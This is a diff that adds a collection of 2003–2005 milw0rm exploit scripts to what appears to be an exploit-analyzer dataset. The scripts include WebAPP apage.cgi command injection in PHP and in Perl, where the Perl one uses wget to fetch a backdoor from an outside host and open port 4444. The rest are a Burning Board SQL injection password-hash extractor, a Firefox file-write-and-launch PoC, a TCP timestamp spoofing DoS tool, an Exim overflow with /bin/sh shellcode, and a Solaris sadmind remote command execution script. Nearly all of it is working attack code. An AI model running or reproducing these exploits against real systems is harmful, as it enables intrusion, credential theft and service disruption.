+#    Advisory: www.defacers.com.mx/advisories/3.txt    #                                               #
+#                                                      #
+#    Saludos:                                          #
+#                                                      #
+#    Soulblack Staff, Status-x, NeosecurityTeam,       #
+#    KingMetal, Trespasser...                          #
+#                                                      #
+########################################################
+#                                                      #
+# sbwebapp.php www.host.com /dirto/apage.cgi "command" #
+#                                                      #
+# Linux dprhensim19.doteasy.com 2.4.22-1.2199.nptl     #
+# #1 Wed Aug 4 12:21:48 EDT 2004 i686 i686 i386        #
+# GNU/Linux                                            #
+# uid=557(scapip) gid=558(scapip) groups=558(scapip)   #
+#                                                      #
+#                                                      #
+#                                                      #
+########################################################
+if ($argc != 4) {
+   echo "\n              =====================================\n";
+   echo "               WebAPP v0.9.9.2.1 apage.cgi Exploit\n";
+   echo "              =====================================\n";
+   echo "                    Nikyt0x - SoulBlack Team\n\n";
+   echo "\nUsage:\n\n";
+   echo " $argv[0] www.host.com /apagedir/apage.cgi \"command\"\n";
+   exit(0);
+   }
+if(!ereg('apage.cgi',$argv[2])) {
+   echo "URL to apage.cgi Incorrect.";
+   exit(0);
+   }
+   echo "\n              =====================================\n";
+   echo "               WebAPP v0.9.9.2.1 apage.cgi Exploit\n";
+   echo "              =====================================\n";
+   echo "                    Nikyt0x - SoulBlack Team\n\n";
+$s0ck3t = fsockopen($argv[1], 80);
+if (!$s0ck3t) {
+   echo "[-] Socket\n";
+   exit(0);
+} else {
+   $ex3cutar = str_replace(" ", "%20", $argv[3]);
+   $petici0n = "GET $argv[2]?f=expofranquicias.htm|echo%20c0mand0s;$ex3cutar;echo%20final1zar| HTTP/1.1\r\n";
+   $petici0n .= "Host: $argv[1]\r\n";
+   $petici0n .= "Connection: Close\r\n\r\n";
+   echo "[+] Socket\n";
+   if(!fwrite($s0ck3t, $petici0n))
+   {
+   echo "[-] Sending Exploit\n";
+   exit(0);
+   }
+   echo "[+] Sending Exploit\n";
+   while (!feof($s0ck3t)) {
+       $g3tdata = fgets($s0ck3t, 1024);
+	   if (eregi('c0mand0s',$g3tdata))
+	   {
+	   $aceptar = 1;
+	   }
+	   if (eregi('final1zar',$g3tdata))
+	   {
+	   $aceptar = 0;
+	   }
+	   while ($aceptar == 1)
+	   {
+	  	   if(eregi('c0mand0s',$g3tdata))
+		   {
+		    $g3tdata = str_replace('c0mand0s','', $g3tdata);
+		   echo "[+] Command:\n";
+		   }
+		   $g3tdata = str_replace('c0mand0s','', $g3tdata);
+		   echo $g3tdata;
+		   break;
+	   }
+   }
+   fclose($s0ck3t);
+}
+?>
+# milw0rm.com [2005-05-20]

exploit-analyzer/exploits/exploit_1005.txt ADDED Viewed

	@@ -0,0 +1,69 @@

+!/usr/bin/perl
+#################################################################
+#                         T r a p - S e t   U n d e r G r o u n D   H a c k i n g   T e a m                               #
+#################################################################
+# Remote C0mmand Executing Expl0it - For WebAPP CGI
+#
+#Exploit By :  A l p h a _ P r o g r a m m e r ( Sirus-v );
+#E-Mail : Alpha_Programmer@Yahoo.com
+#            Trapset_Sec@Yahoo.Ca
+#This xpl Open a Backdoor in 4444 Port with Nobody Access !!! All Of The *NIX OS that Have UnPatch
+#apage.cgi is Vulnerable in this M0ment !!
+#
+#################################################################
+#  Gr33tz To ==>  AlphaST.Com , Crouz.Com  , Simorgh-ev.Com  And  MH_P0rtal , Oil_Krachack     #
+#################################################################
+use IO::Socket;
+if (@ARGV < 2)
+{
+ print "\n==============================================\n";
+ print " \n    WebAPP CGI Exploit By Alpha_Programmer \n\n";
+ print "      Trap-Set Underground Hacking Team      \n\n";
+ print "            Usage: <T4rg3t> <Dir>      \n\n";
+ print "==============================================\n\n";
+ print "Examples:\n\n";
+ print "    WebApp.pl www.Host.com /cgi-bin/ \n";
+ exit();
+}
+$serv = $ARGV[0];
+$serv =~ s/http:\/\///ge;
+$dir = $ARGV[1];
+$cmde = "cd /tmp;wget http://www.khatotarh.com/NeT/alpha.txt";
+$cmde =~ s/ /"\$IFS"/ge;
+$req  = "GET http://$serv";
+$req .= "$dir";
+$req .= "apage.cgi?f=file.htm.|echo\$IFS\"_N_\";$cmde;echo\$IFS\"_T_\"| HTTP/1.0\n\n";
+$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", PeerPort=>80) or die " (-) - C4n't C0nn3ct To The S3rver\n";
+print $sock $req;
+print "\nPlease Wait ...\n\n";
+sleep(3000);
+close($sock);
+$sock2 = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", PeerPort=>80) or die " (-) - C4n't C0nn3ct To The S3rver\n";
+$cmde2 = "cd /tmp;cp alpha.txt alpha.pl;chmod 777 sirus.pl;perl sirus.pl";
+$cmde2 =~ s/ /"\$IFS"/ge;
+$req2  = "GET http://$serv";
+$req2 .= "$dir";
+$req2 .= "apage.cgi?f=file.htm.|echo\$IFS\"_N_\";$cmde2;echo\$IFS\"_T_\"| HTTP/1.0\n\n";
+print $sock2 $req2;
+print "\n\n$$$   OK -- Now Try: Nc -v www.host.com 4444   $$$\n";
+print "$$  if This Port was Close , This mean is That , You Hav'nt Permission to Write in /TMP  $$\n";
+### EOF ###
+# milw0rm.com [2005-05-20]

exploit-analyzer/exploits/exploit_1006.txt ADDED Viewed

	@@ -0,0 +1,100 @@

+#!/usr/bin/perl
+use strict;
+use IO::Socket::INET;
+$| = print "
+Woltlab Burning Board <= 2.3.1 Exploit
+Vulnerability discovered by GulfTech Security Research
+Visit www.security-project.org
+Exploit by deluxe89
+----------
+";
+my $host = 'www.security-project.org';
+my $path = '/wbb2/'; # path to the board
+my $userid = 1; # the password hash will be from the user with this id
+my $username = 'deluxe89'; # any username from the board
+my $proxy = ''; # proxy, you can leave this empty
+my $error = 'E-Mail-Adresse ist unzul&auml;ssig'; # use 'email address entered is already ta' for english boards
+# proxy handling
+my ($addr, $port) = ($proxy ne '') ? split(/:/, $proxy) : ($host, 80);
+if($proxy ne '')
+{
+       print "[~] Using a proxy\n";
+}
+else
+{
+       print "[~] You're using NO proxy!\n";
+       sleep(1);
+}
+#
+# Get the hash
+#
+print "[~] Getting the hash. Please wait some minutes..\n[+] Hash: ";
+my $hash = '';
+for(my $i=1;$i<33;$i++)
+{
+       my $sock = new IO::Socket::INET(PeerAddr => $addr, PeerPort => $port, Proto => 'tcp', Timeout => 8) or die('[-] Could not connect to server');
+       if(&test($i, 96)) # buchstabe
+       {
+               for(my $c=97;$c<103;$c++)
+               {
+                       if(&test($i, $c, 1))
+                       {
+                               print pack('c', $c);
+                               last;
+                       }
+               }
+       }
+       else # zahl
+       {
+               #print "0-4\n";
+               for(my $c=48;$c<58;$c++)
+               {
+                       if(&test($i, $c, 1))
+                       {
+                               print pack('c', $c);
+                               last;
+                       }
+               }
+       }
+}
+print "\n";
+sub test
+{
+       my ($i, $num, $g) = @_;
+       my $sock = new IO::Socket::INET(PeerAddr => $addr, PeerPort => $port, Proto => 'tcp', Timeout => 8) or die('Could not connect to server');
+       my $value = "sre4sdffr\@4g54asd5.org' OR (userid=$userid AND ascii(substring(password,$i,1))";
+       $value .= ($g) ? '=' : '>';
+       $value .= "$num)/*";
+       my $data = "r_username=$username&r_email=$value&r_password=aaaaaaaa&r_confirmpassword=aaaaaaaa&r_homepage=&r_icq=&r_aim=&r_yim=&r_msn=&r_day=0&r_month=0&r_year=&r_gender=0&r_signature=&r_usertext=&field%5B1%5D=&field%5B2%5D=&field%5B3%5D=&r_invisible=0&r_usecookies=1&r_admincanemail=1&r_showemail=1&r_usercanemail=1&r_emailnotify=0&r_notificationperpm=0&r_receivepm=1&r_emailonpm=0&r_pmpopup=0&r_showsignatures=1&r_showavatars=1&r_showimages=1&r_daysprune=0&r_umaxposts=0&r_threadview=0&r_dateformat=d.m.Y&r_timeformat=H%3Ai&r_startweek=1&r_timezoneoffset=1&r_usewysiwyg=0&r_styleid=0&r_langid=0&send=send&sid=&disclaimer=viewed";
+       print $sock "POST http://$host${path}register.php HTTP/1.1\r\nHost: $host\r\nConnection: Close\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: ".length($data)."\r\n\r\n$data\r\n";
+       while(<$sock>)
+       {
+               if($_ =~ m/$error/) { return 1; }
+       }
+       return 0;
+}
+# milw0rm.com [2005-05-20]

exploit-analyzer/exploits/exploit_1007.txt ADDED Viewed

	@@ -0,0 +1,82 @@

+<html>
+<head>
+<title>Firelinking 2 - Proof-of-Concept by mikx</title>
+<-- This PoC is cross platform : On Windows this example creates the file -->
+<-- c:\booom.bat and launches it (opens a dos box with a dir command). On -->
+<-- Linux (tested Fedora Core) and MacOSX the example creates the file -->
+<-- ~/booom.txt or /booom.txt. Depending on caching the the script might -->
+<-- run twice in some cases (this will create an additional booom-1.txt). -->
+<link rel="SHORTCUT ICON" href="favicon.ico">
+<script language="JavaScript" type="text/javascript">
+var pf = navigator.platform.toLowerCase();
+if (pf.indexOf("win") != -1) {
+var os = "win";
+} else if (pf.indexOf("mac") != -1) {
+var os = "mac";
+} else {
+var os = "linux"
+}
+function runDemo() {
+// this is an ugly caching workaround
+document.getElementById('outhtml').innerHTML = "";
+document.getElementById('outhtml').innerHTML += document.getElementById('clearhtml').value
+document.getElementById('outhtml').innerHTML += document.getElementById('clearhtml').value
+document.getElementById('outhtml').innerHTML += document.getElementById('clearhtml').value
+window.setTimeout("document.getElementById('outhtml').innerHTML +=
+document.getElementById('linkhtml_"+os+"').value",300);
+}
+</script>
+</head>
+<body>
+<div style="font-family:Verdana;font-size:11px;">
+<div style="font-family:Verdana;font-size:15px;font-weight:bold;">Firelinking 2 - Proof-of-Concept</div>
+<br><br>
+<div style="width:600px">
+<div id="outhtml" style="display:none"></div>
+<textarea id="clearhtml" style="display:none">
+<link rel="SHORTCUT ICON" href="favicon.ico">
+&lt;/textarea&gt;
+<textarea id="linkhtml_win" style="display:none">
+<link rel="SHORTCUT ICON" href="view-source:javascript:delayedOpenWindow('
+javascript:netscape.security.PrivilegeManager.enablePrivilege(\'UniversalXPConnect\');
+file=Components.classes[\'@mozilla.org/file/local;1\'].createInstance(Components.interfaces.
+nsILocalFile);file.initWithPath(\'c:\\\\booom.bat\');file.createUnique(Components.interfaces.
+nsIFile.NORMAL_FILE_TYPE,420);outputStream=Components.classes[\'@mozilla.org/network/
+file-output-stream;1\'].createInstance(Components.interfaces.nsIFileOutputStream);
+outputStream.init(file,0x04|0x08|0x20,420,0);output=\'@ECHO OFF\\n:BEGIN\\nCLS\\nDIR\\n
+PAUSE\\n:END\';outputStream.write(output,output.length);outputStream.close();file.launch();','','')">
+&lt;/textarea&gt;
+<textarea id="linkhtml_mac" style="display:none">
+<link rel="SHORTCUT ICON" href="view-source:javascript:delayedOpenWindow('javascript:
+netscape.security.PrivilegeManager.enablePrivilege(\'UniversalXPConnect\');file=Components.
+classes[\'@mozilla.org/file/local;1\'].createInstance(Components.interfaces.nsILocalFile);
+file.initWithPath(\'/booom.txt\');file.createUnique(Components.interfaces.nsIFile.
+NORMAL_FILE_TYPE,420);outputStream=Components.classes[\'@mozilla.org/network/
+file-output-stream;1\'].createInstance(Components.interfaces.nsIFileOutputStream);
+outputStream.init(file,0x04|0x08|0x20,420,0);output=\'booom!\';outputStream.write
+(output,output.length);outputStream.close();','','')">
+&lt;/textarea&gt;
+<textarea id="linkhtml_linux" style="display:none">
+<link rel="SHORTCUT ICON" href="view-source:javascript:delayedOpenWindow('javascript:
+netscape.security.PrivilegeManager.enablePrivilege(\'UniversalXPConnect\');file=Components.
+classes[\'@mozilla.org/file/local;1\'].createInstance(Components.interfaces.nsILocalFile);file.
+initWithPath(\'~/booom.txt\');file.createUnique(Components.interfaces.nsIFile.
+NORMAL_FILE_TYPE,420);outputStream=Components.classes[\'@mozilla.org/network/
+file-output-stream;1\'].createInstance(Components.interfaces.nsIFileOutputStream);
+outputStream.init(file,0x04|0x08|0x20,420,0);output=\'booom!\';outputStream.write
+(output,output.length);outputStream.close();','','')">
+&lt;/textarea&gt;
+<br><br>
+<a href="#" onclick="runDemo();runDemo();">Run exploit</a>
+</div>
+</body>
+</html>
+# milw0rm.com [2005-05-21]

exploit-analyzer/exploits/exploit_1008.txt ADDED Viewed

	@@ -0,0 +1,255 @@

+/*
+* TCP does not adequately validate segments before updating timestamp value
+* http://www.kb.cert.org/vuls/id/637934
+*
+* RFC-1323 (TCP Extensions for High Performance)
+*
+* 4.2.1 defines how the PAWS algorithm should drop packets with invalid
+* timestamp options:
+*
+* R1) If there is a Timestamps option in the arriving segment
+* and SEG.TSval < TS.Recent and if TS.Recent is valid (see
+* later discussion), then treat the arriving segment as not
+* acceptable:
+*
+* Send an acknowledgement in reply as specified in
+* RFC-793 page 69 and drop the segment.
+*
+* 3.4 defines what timestamp options to accept:
+*
+* (2) If Last.ACK.sent falls within the range of sequence numbers
+* of an incoming segment:
+*
+* SEG.SEQ <= Last.ACK.sent < SEG.SEQ + SEG.LEN
+*
+* then the TSval from the segment is copied to TS.Recent;
+* otherwise, the TSval is ignored.
+*
+* http://community.roxen.com/developers/idocs/drafts/
+* draft-jacobson-tsvwg-1323bis-00.html
+*
+* 3.4 suggests an slightly different check like
+*
+* (2) If: SEG.TSval >= TSrecent and SEG.SEQ <= Last.ACK.sent
+* then SEG.TSval is copied to TS.Recent; otherwise, it is
+* ignored.
+*
+* and explains this change
+*
+* APPENDIX C: CHANGES FROM RFC-1072, RFC-1185, RFC-1323
+*
+* There are additional changes in this document from RFC-1323.
+* These changes are:
+* (b) In RFC-1323, section 3.4, step (2) of the algorithm to control
+* which timestamp is echoed was incorrect in two regards:
+* (1) It failed to update TSrecent for a retransmitted segment
+* that resulted from a lost ACK.
+* (2) It failed if SEG.LEN = 0.
+* In the new algorithm, the case of SEG.TSval = TSrecent is
+* included for consistency with the PAWS test.
+*
+* At least OpenBSD and FreeBSD contain this code instead:
+*
+* sys/netinet/tcp_input.c tcp_input()
+*
+* **
+* * If last ACK falls within this segment's sequence numbers,
+* * record its timestamp.
+* * NOTE that the test is modified according to the latest
+* * proposal of the tcplw@cray.com list (Braden 1993/04/26).
+* **
+* if ((to.to_flags & TOF_TS) != 0 &&
+* SEQ_LEQ(th->th_seq, tp->last_ack_sent)) {
+* tp->ts_recent_age = ticks;
+* tp->ts_recent = to.to_tsval;
+* }
+*
+* The problem here is that the packet the timestamp is accepted from doesn't
+* need to have a valid th_seq or th_ack. This point of execution is reached
+* for packets with arbitrary th_ack values and th_seq values of half the
+* possible value range, because the first 'if (todrop > tlen)' check in the
+* function explicitely continues execution to process ACKs.
+*
+* If an attacker knows (or guesses) the source and destination addresses and
+* ports of a connection between two peers, he can send spoofed TCP packets
+* to either peer containing bogus timestamp options. Since half of the
+* possible th_seq and timestamp values are accepted, four packets containing
+* two random values and their integer wraparound opposites are sufficient to
+* get one random timestamp accepted by the receipient. Further packets from
+* the real peer will get dropped by PAWS, and the TCP connection stalls and
+* times out.
+*
+* The following change reverts the tcp_input() check back to the implemented
+* suggested by draft-jacobson-tsvwg-1323bis-00.txt
+*
+* if (opti.ts_present && TSTMP_GEQ(opti.ts_val, tp->ts_recent) &&
+* SEQ_LEQ(th->th_seq, tp->last_ack_sent)) {
+* + if (SEQ_LEQ(tp->last_ack_sent, th->th_seq + tlen +
+* + ((tiflags & (TH_SYN|TH_FIN)) != 0)))
+* + tp->ts_recent = opti.ts_val;
+* + else
+* + tp->ts_recent = 0;
+* tp->ts_recent_age = tcp_now;
+* - tp->ts_recent = opti.ts_val;
+* }
+*
+* I can't find Braden's proposal referenced in the comment. It seems to
+* pre-date draft-jacobson-tsvwg-1323bis-00.txt and might be outdated by
+* it.
+*
+* Fri Mar 11 02:33:36 MET 2005 Daniel Hartmeier <daniel@benzedrine.cx>
+*
+* http://www.openbsd.org/cgi-bin/cvsweb/src/sys/netinet/tcp_input.c.diff\
+* ?r1=1.184&r2=1.185&f=h
+*
+* http://www.freebsd.org/cgi/cvsweb.cgi/src/sys/netinet/tcp_input.c.diff\
+* ?r1=1.252.2.15&r2=1.252.2.16&f=h
+*
+*/
+#include <stdio.h>
+#include <stdlib.h>
+#include <sys/socket.h>
+#include <net/if.h>
+#ifdef __FreeBSD__
+#include <net/if_var.h>
+#endif
+#include <netinet/in.h>
+#include <netinet/in_var.h>
+#include <netinet/in_systm.h>
+#include <netinet/ip.h>
+#include <netinet/tcp.h>
+static u_int16_t
+checksum(u_int16_t *data, u_int16_t length)
+{
+u_int32_t value = 0;
+u_int16_t i;
+for (i = 0; i < (length >> 1); ++i)
+value += data[i];
+if ((length & 1) == 1)
+value += (data[i] << 8);
+value = (value & 65535) + (value >> 16);
+return (~value);
+}
+static int
+send_tcp(int sock, u_int32_t saddr, u_int32_t daddr, u_int16_t sport,
+u_int16_t dport, u_int32_t seq, u_int32_t ts)
+{
+u_char packet[1600];
+struct tcphdr *tcp;
+struct ip *ip;
+unsigned char *opt;
+int optlen, len, r;
+struct sockaddr_in sin;
+memset(packet, 0, sizeof(packet));
+opt = packet + sizeof(struct ip) + sizeof(struct tcphdr);
+optlen = 0;
+opt[optlen++] = TCPOPT_NOP;
+opt[optlen++] = TCPOPT_NOP;
+opt[optlen++] = TCPOPT_TIMESTAMP;
+opt[optlen++] = 10;
+ts = htonl(ts);
+memcpy(opt + optlen, &ts, sizeof(ts));
+optlen += sizeof(ts);
+ts = htonl(0);
+memcpy(opt + optlen, &ts, sizeof(ts));
+optlen += sizeof(ts);
+len = sizeof(struct ip) + sizeof(struct tcphdr) + optlen;
+ip = (struct ip *)packet;
+ip->ip_src.s_addr = saddr;
+ip->ip_dst.s_addr = daddr;
+ip->ip_p = IPPROTO_TCP;
+ip->ip_len = htons(sizeof(struct tcphdr) + optlen);
+tcp = (struct tcphdr *)(packet + sizeof(struct ip));
+tcp->th_sport = htons(sport);
+tcp->th_dport = htons(dport);
+tcp->th_seq = htonl(seq);
+tcp->th_ack = 0;
+tcp->th_off = (sizeof(struct tcphdr) + optlen) / 4;
+tcp->th_flags = 0;
+tcp->th_win = htons(16384);
+tcp->th_sum = 0;
+tcp->th_urp = 0;
+tcp->th_sum = checksum((u_int16_t *)ip, len);
+ip->ip_v = 4;
+ip->ip_hl = 5;
+ip->ip_tos = 0;
+ip->ip_len = htons(len);
+ip->ip_id = htons(arc4random() % 65536);
+ip->ip_off = 0;
+ip->ip_ttl = 64;
+sin.sin_family = AF_INET;
+sin.sin_addr.s_addr = saddr;
+r = sendto(sock, packet, len, 0, (struct sockaddr *)&sin, sizeof(sin));
+if (r != len) {
+perror("sendto");
+return (1);
+}
+return (0);
+}
+static u_int32_t
+op(u_int32_t u)
+{
+return (u_int32_t)(((u_int64_t)u + 2147483648UL) % 4294967296ULL);
+}
+int main(int argc, char *argv[])
+{
+u_int32_t saddr, daddr, seq, ts;
+u_int16_t sport, dport;
+int sock, i;
+if (argc != 5) {
+fprintf(stderr, "usage: %s <src ip> <src port> "
+"<dst ip> <dst port>\n", argv[0]);
+return (1);
+}
+saddr = inet_addr(argv[1]);
+daddr = inet_addr(argv[3]);
+sport = atoi(argv[2]);
+dport = atoi(argv[4]);
+sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
+if (sock < 0) {
+perror("socket");
+return (1);
+}
+i = 1;
+if (setsockopt(sock, IPPROTO_IP, IP_HDRINCL, &i, sizeof(i)) == -1) {
+perror("setsockopt");
+close(sock);
+return (1);
+}
+seq = arc4random();
+ts = arc4random();
+if (send_tcp(sock, saddr, daddr, sport, dport, seq, ts) ||
+send_tcp(sock, saddr, daddr, sport, dport, seq, op(ts)) ||
+send_tcp(sock, saddr, daddr, sport, dport, op(seq), ts) ||
+send_tcp(sock, saddr, daddr, sport, dport, op(seq), op(ts))) {
+fprintf(stderr, "failed\n");
+close(sock);
+return (1);
+}
+close(sock);
+printf("done\n");
+return (0);
+}
+// milw0rm.com [2005-05-21]

exploit-analyzer/exploits/exploit_1009.txt ADDED Viewed

	@@ -0,0 +1,70 @@

+/*
+ * ripped straight off iDEFENSE advisory - so lazy I just picked
+ * up GDB... bored on a weeknight :(
+ *
+ * nothing to write home to mother about due to the fact that
+ * you need a local user account on a server and all you
+ * get is to read other people's emails ....
+ *
+ * not even my own shellcode. aleph1 shellcode - cut and paste job
+ * with nops to pad.
+ *
+ * Regards,
+ * Plugger aka Tony Lockett
+ *
+ *
+ *
+ */
+char bomb[288]=
+/* the gear from iDEFENSE */
+"::%A:::::::::::::::::"                             /* 21 bytes  */
+                                                    /* --------  */
+/* NOPS for padding */
+"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
+"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
+"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
+"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
+"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
+"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
+"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
+"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
+"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
+"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
+"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
+"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
+"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
+"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
+"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
+"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
+"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
+"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
+"\x90\x90"                                          /* 218 bytes */
+                                                    /* --------- */
+/* actual code courtesy Aleph1 */
+"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89"  /* 12 bytes  */
+"\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"  /* 12 bytes  */
+"\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80"              /* 9 bytes   */
+"\xe8\xdc\xff\xff\xff/bin/sh"                       /* 12 bytes  */
+/* where EIP should point */
+"\xf4\xf2\xff\xbf";                                 /*  4 bytes  */
+                                                    /* --------  */
+                                                    /* 49 bytes  */
+                                                    /* --------  */
+                                                    /* 288 bytes */
+                                                    /* ========= */
+main()
+{
+  char *exim[4];
+  exim[0] = "/usr/exim/bin/exim";
+  exim[1] = "-bh";
+  exim[2] = bomb;
+  exim[3] = 0x0;
+  printf("Firing up exim - cross your fingers for shell!\n");
+  execve(exim[0],exim,0x0);
+  return;
+}
+// milw0rm.com [2005-05-25]

exploit-analyzer/exploits/exploit_101.txt ADDED Viewed

	@@ -0,0 +1,429 @@

+#!/usr/bin/perl -w
+##################
+##
+#      Title: rootdown.pl
+#      Purpose: Solaris Remote command executiong via sadmind
+#      Author: H D Moore hdm at metasploit.com
+#      Copyright: Copyright (C) 2003 METASPLOIT.COM
+##
+use strict;
+use POSIX;
+use IO::Socket;
+use IO::Select;
+use Getopt::Std;
+my $VERSION = "1.0";
+my %opts;
+getopts("h:p:c:r:iv", \%opts);
+if ($opts{v}) { show_info() }
+if (! $opts{h}) { usage() }
+my $target_host = $opts{h};
+my $target_name = "exploit";
+my $command = $opts{c} ? $opts{c} : "touch /tmp/OWNED_BY_SADMIND_\$\$";
+my $portmap = $opts{r} ? $opts{r} : 111;
+##
+# Determine the port used by sadmind
+##
+my $target_port = $opts{p} ? $opts{p} : rpc_getport($target_host, $portmap, 100232, 10);
+if (! $target_port)
+{
+    print STDERR "Error: could not determine port used by sadmind\n";
+    exit(0);
+}
+##
+#  Determine the hostname of the target
+##
+my $s = rpc_socket($target_host, $target_port);
+my $x = rpc_sadmin_exec($target_name, "id");
+print $s $x;
+my $r = rpc_read($s);
+close ($s);
+if ($r && $r =~ m/Security exception on host (.*)\.  USER/)
+{
+    $target_name = $1;
+} else {
+    print STDERR "Error: could not obtain target hostname.\n";
+    exit(0);
+}
+##
+#  Execute commands :)
+##
+my $interactive = 0;
+if ($opts{i}) { $interactive++ }
+do {
+    if ($opts{i}) { $command = command_prompt() } else
+    {
+        print STDERR "Executing command on '$target_name' via port $target_port\n";
+    }
+    $s = rpc_socket($target_host, $target_port);
+    $x = rpc_sadmin_exec($target_name, $command);
+    print $s $x;
+    $r = rpc_read($s);
+    close ($s);
+    if ($r)
+    {
+        # Command Failed
+        if (length($r) == 36 && substr($r, 24, 4) eq "\x00\x00\x00\x29")
+        {
+            print STDERR "Error: something went wrong with the RPC format.\n";
+            exit(0);
+        }
+        # Command might have failed
+        if (length($r) == 36 && substr($r, 24, 4) eq "\x00\x00\x00\x2b")
+        {
+            print STDERR "Error: something may have gone wrong with the sadmind format\n";
+        }
+        # Confirmed success
+        if (length($r) == 36 && substr($r, 24, 12) eq ("\x00" x 12))
+        {
+            print STDERR "Success: your command has been executed successfully.\n";
+        }
+        if (length($r) != 36)  { print STDERR "Unknown Response: $r\n" }
+    } else {
+        print STDERR "Error: no response recieved, you may want to try again.\n";
+        exit(0);
+    }
+} while ($interactive);
+exit(0);
+sub usage {
+    print STDERR "\n";
+    print STDERR "+-----==[ rootdown.pl => Solaris SADMIND Remote Command Execution\n\n";
+    print STDERR "       Usage:   $0 -h <target> -c <command> [options]\n";
+    print STDERR "     Options:\n";
+    print STDERR "                -i\tStart interactive mode (for multiple commands)\n";
+    print STDERR "                -p\tAvoid the portmapper and use this sadmind port\n";
+    print STDERR "                -r\tQuery alternate portmapper on this UDP port\n";
+    print STDERR "                -v\tDisplay information about this exploit\n";
+    print STDERR "\n\n";
+    exit(0);
+}
+sub show_info {
+print "\n\n";
+print "   Name:  rootdown.pl\n";
+print " Author:  H D Moore <hdm\@metasploit.com>\n";
+print "Version:  $VERSION\n\n";
+# not finsihed :)
+print
+"This exploit targets a weakness in the default security settings
+of the sadmind RPC application. This application is installed and
+enabled by default on most versions of the Solaris operating
+system.\n\n".
+"The sadmind application defaults to a weak security mode known as
+AUTH_SYS (or AUTH_UNIX under Linux/BSD). When running in this mode,
+the service will accept a structure containing the user and group
+IDs as well as the originating system name. These values are not
+validated in any form and are completely controlled by the client.
+If the standard sadmin RPC API calls are used to generate the request,
+the ADM_CLIENT_HOST parameter is filled in with the hostname of the
+client system. If the RPC packet is modified so that this field is
+set to the hostname of the remote system, it will be processed as
+if it was a local request. If the user ID is set to zero or the
+value of any user in the sysadmin group, it is possible to call
+arbitrary methods in any class available to sadmind.\n\n".
+"If the Solstice AdminSuite client software has not been installed,
+the only class available is 'system', which only contains a single
+method called 'admpipe'. The strings within this program seem to
+suggest that it can be used run arbitrary commands, however I chose
+a different method of command execution. Since each method is simply
+an executable in the class directory, it is possible to use a
+standard directory traversal attack to execute any application.
+We can pass arguments to these methods using the standard API.
+An example of spawning a shell which executes the 'id' command:
+    # apm -c system -m ../../../../../bin/sh -a arg1=-c arg2=id\n\n".
+"To exploit this vulnerability, we must create a RPC packet that
+calls the '/bin/sh' method, passing it the parameter of the command
+we want to execute. To do this, packet dumps of the 'apm' tool
+were obtained and the format was slowly mapped. The hostname of
+the target system must be known for this exploit to work, however
+when sadmind is called with the wrong name, it replies with a
+'ACCESS DENIED' error message containing the correct name. The
+final code does the following:
+1) Queries the portmapper to determine the sadmind port
+2) Sends an invalid request to sadmind to obtain the hostname
+3) Uses the hostname to forge the RPC packet and execute commands
+This vulnerability was reported by Mark Zielinski and disclosed by iDefense.
+Related URLs:
+ - http://www.idefense.com/advisory/09.16.03.txt
+ - http://docs.sun.com/db/doc/816-0211/6m6nc676b?a=view
+";
+exit(0);
+}
+sub command_prompt {
+    select(STDOUT); $|++;
+    print STDOUT "\nsadmind> ";
+    my $command = <STDIN>;
+    chomp($command);
+    if (! $command || lc($command) eq "quit" || lc($command) eq "exit")
+    {
+        print "\nExiting interactive mode...\n";
+        exit(0);
+    }
+    return ($command)
+}
+sub rpc_socket {
+    my ($target_host, $target_port) = @_;
+    my $s = IO::Socket::INET->new
+    (
+        PeerAddr => $target_host,
+        PeerPort => $target_port,
+        Proto    => "udp",
+        Type     => SOCK_DGRAM
+    );
+    if (! $s)
+    {
+        print "\nError: could not create socket to target: $!\n";
+        exit(0);
+    }
+    select($s); $|++;
+    select(STDOUT); $|++;
+    nonblock($s);
+    return($s);
+}
+sub rpc_read {
+    my ($s) = @_;
+    my $sel = IO::Select->new($s);
+    my $res;
+    my @fds = $sel->can_read(4);
+    foreach (@fds) { $res .= <$s>; }
+    return $res;
+}
+sub nonblock {
+    my ($fd) = @_;
+    my $flags = fcntl($fd, F_GETFL,0);
+    fcntl($fd, F_SETFL, $flags|O_NONBLOCK);
+}
+sub rpc_getport {
+    my ($target_host, $target_port, $prog, $vers) = @_;
+    my $s = rpc_socket($target_host, $target_port);
+    my $portmap_req =
+        pack("L", rand() * 0xffffffff) . # XID
+        "\x00\x00\x00\x00".              # Call
+        "\x00\x00\x00\x02".              # RPC Version
+        "\x00\x01\x86\xa0".              # Program Number  (PORTMAP)
+        "\x00\x00\x00\x02".              # Program Version (2)
+        "\x00\x00\x00\x03".              # Procedure (getport)
+        ("\x00" x 16).                   # Credentials and Verifier
+        pack("N", $prog) .
+        pack("N", $vers).
+        pack("N", 0x11).                 # Protocol: UDP
+        pack("N", 0x00);                 # Port: 0
+    print $s $portmap_req;
+    my $r = rpc_read($s);
+    close ($s);
+    if (length($r) == 28)
+    {
+        my $prog_port = unpack("N",substr($r, 24, 4));
+        return($prog_port);
+    }
+    return undef;
+}
